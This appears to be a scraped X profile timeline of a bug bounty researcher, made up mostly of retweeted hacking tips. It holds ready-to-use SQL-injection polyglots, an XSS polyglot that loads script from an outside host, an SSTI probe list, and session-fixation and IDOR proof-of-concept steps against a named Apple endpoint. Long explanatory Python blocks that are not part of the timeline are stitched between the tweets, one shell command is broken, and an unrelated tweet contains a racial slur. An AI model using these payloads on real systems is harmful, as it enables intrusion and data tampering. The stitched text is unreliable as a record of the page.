Santiko Kusnul Hakim
@getnow1986

701 posts

@HackenProof Security Researcher 🇮🇩 ind(o)p3nd3nt cybrscrty 🇮🇩 dapodik ops

Malang, Jawa Timur · Joined October 2022
423 Following · 86 Followers
Santiko Kusnul Hakim retweeted
Brute Logic @BRuteLogic
#SQL Injection Polyglots (Tested on MySQL & MariaDB)
&1/*'/*"/**/||1#\
-1/*'/*"/**/||1--+\
It performs injection in single- and double-quote scenarios plus quoteless ones (where the injection lands in 2 consecutive points of the query). Use it in ALL input fields at once.
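To see why one string works in three contexts, the following added example (not code from the tweet or its author) drops both polyglots into a single-quoted, a double-quoted and a numeric query template and strips MySQL comments the way the parser would. The two payloads are the tweet's; the templates, the `users` table name and the comment-stripping logic are assumptions made here.

```python
"""Where Brute Logic's two MySQL/MariaDB polyglots land in three query contexts.

Added example, not code from the tweet. The two payloads are the tweet's; the
query templates and the MySQL-dialect comment stripper are assumptions made
here so the effective query can be shown without a database.
"""
from urllib.parse import unquote_plus

# The two polyglots exactly as posted; each ends in a single backslash.
POLYGLOT_AND = "&1/*'/*\"/**/||1#\\"
POLYGLOT_MINUS = "-1/*'/*\"/**/||1--+\\"

# Assumed vulnerable query shapes. In the numeric context the payload is
# appended to an existing value (id=5): '&1' on its own has no left operand.
TEMPLATES = {
    "single-quoted": "SELECT id FROM users WHERE name='{}'",
    "double-quoted": 'SELECT id FROM users WHERE name="{}"',
    "numeric": "SELECT id FROM users WHERE id=5{}",
}


def effective_mysql(query: str) -> str:
    """Return the query as the MySQL parser effectively sees it.

    String literals ('...' or "...", with backslash escapes and doubled quotes)
    are copied through untouched, /* */ comments become a space, and '#' or
    '-- ' comments swallow the rest of the (single-line) query. Whitespace is
    then normalised so results compare cleanly.
    """
    out, i, n = [], 0, len(query)
    while i < n:
        c = query[i]
        if c in ("'", '"'):
            j = i + 1
            while j < n:
                if query[j] == "\\":                       # escape: skip next char
                    j += 2
                    continue
                if query[j] == c:
                    if j + 1 < n and query[j + 1] == c:    # doubled quote inside literal
                        j += 2
                        continue
                    break
                j += 1
            out.append(query[i:j + 1])
            i = j + 1
        elif query.startswith("/*", i):
            end = query.find("*/", i + 2)
            if end == -1:                                   # unterminated: swallows the rest
                break
            out.append(" ")
            i = end + 2
        elif c == "#" or (query.startswith("--", i) and (i + 2 >= n or query[i + 2] in " \t\n")):
            break                                           # line comment to end of query
        else:
            out.append(c)
            i += 1
    return " ".join("".join(out).split())


def landing_table(raw_payload: str) -> dict:
    """Decode the payload as a query-string parser would ('+' becomes a space,
    which is what makes '--+' a valid MySQL line comment), drop it into every
    template and map context -> effective query."""
    payload = unquote_plus(raw_payload)
    return {ctx: effective_mysql(tpl.format(payload)) for ctx, tpl in TEMPLATES.items()}


if __name__ == "__main__":
    for label, p in (("AND form", POLYGLOT_AND), ("MINUS form", POLYGLOT_MINUS)):
        print(label)
        for ctx, q in landing_table(p).items():
            print(f"  {ctx:14} {q}")
```

Every effective WHERE ends in `||1`. Under MySQL's and MariaDB's default sql_mode `||` is logical OR, so each condition collapses to `... OR 1`; with `PIPES_AS_CONCAT` set, or on PostgreSQL and SQLite, `||` is string concatenation and the trick does not fire, which is why the tweet scopes it to MySQL and MariaDB.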
Santiko Kusnul Hakim retweeted
VIEH Group @viehgroup
Session Fixation → Account Takeover POC →
1. Attacker generated a valid session ID before login
2. Sent the session link to the victim
3. Victim logged in using the same session
4. Server did not regenerate the session after authentication
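The four steps above, replayed against a toy server both with and without session regeneration, as an added example that is not part of the original post. The in-memory `SessionStore`, the `USERS` table and the login flow are assumptions made here; the only thing taken from the post is the sequence of steps.

```python
"""Session fixation: the four steps in the tweet, run against a toy server
with and without session regeneration at login.

Added example, not from the tweet. The in-memory SessionStore, the user
table and the login flow are assumptions made here for illustration.
"""
import hmac
import secrets

# Constructed credential table: username -> password (plain text only to keep
# the example short; a real service stores a salted hash).
USERS = {"victim": "correct horse battery staple"}


class SessionStore:
    """Minimal cookie-style session store keyed by an opaque session id."""

    def __init__(self, regenerate_on_login: bool):
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(24)
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, username: str, password: str) -> str:
        """Authenticate and return the session id the client should use afterwards."""
        if sid not in self.sessions:
            sid = self.new_session()
        expected = USERS.get(username, "")
        if not hmac.compare_digest(expected.encode(), password.encode()):
            return sid                        # failed login keeps the anonymous session
        if self.regenerate_on_login:
            # The fix: discard the pre-auth id and issue a fresh one, so an id
            # planted by an attacker before login never becomes authenticated.
            del self.sessions[sid]
            sid = self.new_session()
        self.sessions[sid]["user"] = username
        return sid

    def whoami(self, sid: str):
        return self.sessions.get(sid, {}).get("user")


def run_fixation(regenerate_on_login: bool):
    """Replay the tweet's four steps. Returns (user the attacker's planted id
    resolves to, user the victim's post-login id resolves to)."""
    app = SessionStore(regenerate_on_login)
    attacker_sid = app.new_session()                   # 1. attacker obtains a valid id
    # 2. attacker delivers that id to the victim (link with the id, cookie injection, ...)
    victim_sid = app.login(attacker_sid, "victim", USERS["victim"])  # 3. victim logs in on it
    return app.whoami(attacker_sid), app.whoami(victim_sid)          # 4. does the old id carry the login?


if __name__ == "__main__":
    print("no regeneration:", run_fixation(False))    # attacker's id now resolves to 'victim'
    print("regenerate     :", run_fixation(True))     # attacker's id is dead, victim's new id works
```

The only difference between the two runs is the `del`/`new_session()` pair after a successful password check; that is the server-side fix the fourth step of the POC says was missing.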
Santiko Kusnul Hakim retweeted
KNOXSS @KN0X55
Use this #XSS payload and pop alert boxes EVERYWHERE! 😎👇
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:X55.is/.source))}//\76-->
Santiko Kusnul Hakim retweeted
NaZaniin @n0aziXss
⚠️SSTI (Server Side Template Injection) Payload List → If evaluated as 49, the target is vulnerable:
1. {7*7}
2. {7*7}
3. {{7*7}}
4. [[7*7]]
5. ${7*7}
6. @(7*7)
7. <?=7*7?>
8. <%= 7*7 %>
9. ${= 7*7}
10. {{= 7*7}}
11. ${{7*7}}
12. #{7*7}
13. [=7*7]
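An added example, not part of the original post, that automates the list above and adds the check a practitioner wants: a `49` that was already on the page (a build number, a price) makes a `7*7` probe report every syntax as vulnerable, so the robust probe multiplies two random three-digit numbers and requires the raw payload to be absent from the response. The toy vulnerable target (`toy_target`) and the probe functions are assumptions constructed here; no real site is contacted.

```python
"""Probing for SSTI with the delimiter styles from the list above, plus the
check the list leaves out: a random product instead of 7*7, so a '49' that
was already on the page is not mistaken for template evaluation.

Added example, not from the tweet. The toy vulnerable target and the probe
logic are assumptions made here; no real site is contacted.
"""
import ast
import operator
import random
import re

# (open, close) pairs covering the list's thirteen entries.
SYNTAXES = [
    ("{{", "}}"), ("{", "}"), ("[[", "]]"), ("${", "}"), ("@(", ")"),
    ("<?=", "?>"), ("<%=", "%>"), ("${=", "}"), ("{{=", "}}"),
    ("${{", "}}"), ("#{", "}"), ("[=", "]"),
]

_OPS = {ast.Mult: operator.mul, ast.Add: operator.add, ast.Sub: operator.sub}


def _safe_arith(expr: str) -> int:
    """Evaluate integer +, -, * expressions from an AST; stands in for the
    engine's expression evaluator without calling eval()."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported expression")
    return walk(ast.parse(expr, mode="eval").body)


def toy_target(user_input: str) -> str:
    """Constructed vulnerable endpoint: reflects input into a page and, like a
    Jinja-style engine, evaluates anything between {{ and }}. The footer
    already contains '49', the classic false positive for a 7*7 probe."""
    def render(m):
        try:
            return str(_safe_arith(m.group(1).strip()))
        except (ValueError, SyntaxError):
            return m.group(0)                    # unparseable: echoed untouched
    body = re.sub(r"\{\{(.*?)\}\}", render, user_input)
    return f"<h1>Hello {body}</h1><footer>build 49</footer>"


def naive_probe(send) -> list:
    """The list's check as written: '49' anywhere in the response counts."""
    return [o + "..." + c for o, c in SYNTAXES if "49" in send(f"{o}7*7{c}")]


def probe(send, rng=None) -> list:
    """Per syntax, send a*b with random three-digit factors; count a hit only
    if the product appears and the raw payload does not (evaluated, not echoed)."""
    rng = rng or random.Random(1)
    hits = []
    for o, c in SYNTAXES:
        a, b = rng.randint(100, 999), rng.randint(100, 999)
        payload = f"{o}{a}*{b}{c}"
        resp = send(payload)
        if str(a * b) in resp and payload not in resp:
            hits.append(o + "..." + c)
    return hits


if __name__ == "__main__":
    print("naive :", naive_probe(toy_target))   # every syntax "hits" because of the footer
    print("robust:", probe(toy_target))         # only the {{ }} forms really evaluate
```

Against the toy target the naive probe flags all twelve delimiter styles, while the random-product probe flags only `{{...}}` and `${{...}}`; the second is a genuine hit too, because the engine evaluates the inner `{{...}}` and leaves the `$` in front of the result, which is exactly how that entry in the list is meant to behave.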
Behi @Behi_Sec
Which platform is the best currently? H1, Bugcrowd or Intigriti?
Santiko Kusnul Hakim retweeted
kaden.eth @0xKaden
Here's an index of 460 common solidity vulnerabilities across 31 unique protocol types scraped from over 10000 solodit findings optimized for LLMs github.com/kadenzipfel/pr…
Santiko Kusnul Hakim retweeted
VIEH Group @viehgroup
IDOR in APPLE 🍎 POC ->
1. Created two separate user accounts, Account A (attacker) and Account B (victim), on consultants.apple[.]com/publicLocator/deleteApplication and consultants.apple[.]com/publicLocator/submitJoinForm
2. Logged in as Account B, submitted the application form and captured the application ID of Account B
3. Now log in as Account A and intercept a request to the affected endpoint
4. Replaced Account A's application ID with Account B's application ID
5. Forwarded the modified request
6. Server accepted the request without authorization validation
7. Logged back into Account B
8. Account B's data is modified or deleted without consent
Impact -> Any authenticated user can modify or delete other users' data
Credited to the respected owner
#bugbounty #bughunting #bounty #hacking #ethicalhacking #infosec #cybersecurity #bugbountytips #bugbounty #bugbountytip #bughunting #infosecurity #OWASP #ApplicationSecurity #Bugcrowd #Hackerone #day_20
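The authorization gap in step 6 of the POC above, shown as an added example that is not the affected site's code: a delete handler that selects the record by id alone, beside one that selects by (id, owner). The in-memory store, the `Application` record, the account names and the handler names are all assumptions made here.

```python
"""The authorization gap behind the IDOR POC above: an endpoint that finds an
application by id and acts on it for any logged-in caller, beside a version
that binds the lookup to the caller.

Added example, not the affected site's code. The in-memory store, record
shape and handler names are assumptions made here for illustration.
"""
from dataclasses import dataclass


@dataclass
class Application:
    app_id: int
    owner: str            # account that submitted the form
    status: str = "submitted"


class Forbidden(Exception):
    """Raised when the caller does not own the record (would map to HTTP 403)."""


def seed_store() -> dict:
    """Constructed data: account A (attacker) owns 1001, account B (victim) owns 1002."""
    return {
        1001: Application(1001, "account_a"),
        1002: Application(1002, "account_b"),
    }


def delete_application_vulnerable(session_user: str, app_id: int, store: dict) -> bool:
    """Authenticated but never authorized: the session proves who the caller is,
    yet the record is selected by id alone, so any id from any account works."""
    if app_id not in store:
        return False
    del store[app_id]
    return True


def delete_application_fixed(session_user: str, app_id: int, store: dict) -> bool:
    """Select by (id, owner). A missing record and someone else's record are
    refused identically, so the error cannot be used to enumerate valid ids."""
    record = store.get(app_id)
    if record is None or record.owner != session_user:
        raise Forbidden(f"{session_user} may not delete application {app_id}")
    del store[app_id]
    return True


def replay_poc(handler) -> bool:
    """Steps 3-6 of the POC: account A replays the delete with account B's id.
    Returns True if B's application survived the request."""
    store = seed_store()
    try:
        handler("account_a", 1002, store)
    except Forbidden:
        pass
    return 1002 in store


if __name__ == "__main__":
    print("vulnerable handler, B's record survived:", replay_poc(delete_application_vulnerable))
    print("fixed handler, B's record survived:     ", replay_poc(delete_application_fixed))
```

The same pattern applies to the modify path: every query that takes a client-supplied id needs the owner (from the session, never from the request) as part of the lookup, not as a separate check that can be forgotten on one endpoint.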
Santiko Kusnul Hakim retweeted
Hugging Models @HuggingModels
Meet VulnLLM-R-7B: a specialized AI that reads code like a security expert. It's trained to spot vulnerabilities before they become breaches. This isn't just another chatbot, it's a digital security guard for your codebase. The community is buzzing because it makes security accessible.
Dez Bryant @DezBryant
The word don't bother me.. I don't say nigga to be rude to folks.. let's change the topic real quick.... do you have any goals in life?
Quoting NoMadDubois @TriggaTwitta: @DezBryant Why don't we use any other social derogatory phrase in common banter??
Santiko Kusnul Hakim retweeted
X @TheMsterDoctor1
🚀 **Hack Like a Pro:** Extract IPs from Shodan HTML in Seconds! 🔥 Sick of digging through HTML? Let `grep` do the work! 💻
```bash
grep -oP '(?<=).*?(?=)' ip.html > ips
```
1️⃣ **Save Shodan page source as HTML**
2️⃣ **Run this command**
3️⃣ **BOOM 💥** — All IPs extracted to `ips`!
Master your toolkit! #KaliLinux #HackingTips #CyberSecurity #Shodan #OSINT
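The grep above keys on fixed HTML tags around each address (the tag text is not preserved in the command as reproduced here), so it breaks whenever the page layout changes. An added example, not the tweet's command, that does the same job from the saved page source without depending on markup: it finds IPv4-shaped candidates, validates each octet range with `ipaddress`, and de-duplicates. The `SAMPLE_HTML` is constructed here and only imitates a results page.

```python
"""Pull IPv4 addresses out of a saved results page without depending on its
markup. Added example, not the tweet's command; SAMPLE_HTML is constructed.
"""
import ipaddress
import re
import sys

# Constructed stand-in for a saved results page: one address appears twice,
# a version string looks like five dotted numbers, and one candidate is out of range.
SAMPLE_HTML = """<div class="result"><a href="/host/203.0.113.7">203.0.113.7</a>
<span>Apache/2.4.52</span></div>
<div class="result"><a href="/host/198.51.100.23">198.51.100.23</a>
<span>version 1.2.3.4.5</span> <!-- 999.1.1.1 is not an address --></div>
<div class="result"><a href="/host/203.0.113.7">203.0.113.7</a></div>
"""

# Four dotted 1-3 digit groups, not touching another digit or dot on either
# side, so '1.2.3.4.5' does not yield a spurious '1.2.3.4'.
_CANDIDATE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def extract_ips(html: str) -> list:
    """Return unique IPv4 addresses in order of first appearance.

    The regex only proposes candidates; ipaddress does the real validation,
    which rejects octets above 255 such as 999.1.1.1.
    """
    found = []
    for m in _CANDIDATE.finditer(html):
        candidate = m.group(1)
        try:
            ipaddress.IPv4Address(candidate)
        except ValueError:
            continue
        if candidate not in found:
            found.append(candidate)
    return found


if __name__ == "__main__":
    # Usage: python extract_ips.py saved_page.html > ips  (falls back to the sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            page = fh.read()
    else:
        page = SAMPLE_HTML
    print("\n".join(extract_ips(page)))
```

Swap the `_CANDIDATE` pattern for `ipaddress.IPv6Address` plus an IPv6 regex if the page mixes address families; the validate-after-match structure stays the same.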
dawgyg - WoH @thedawgyg
@host_down @DezBryant I used afl to fuzz a part of chromium, found them with the fuzzer. After I validated them and figured out root cause I then used a couple of agents to help me craft a PoC that could trigger them from HTML.
HackenProof @HackenProof
What's the most rewarding bug you've caught?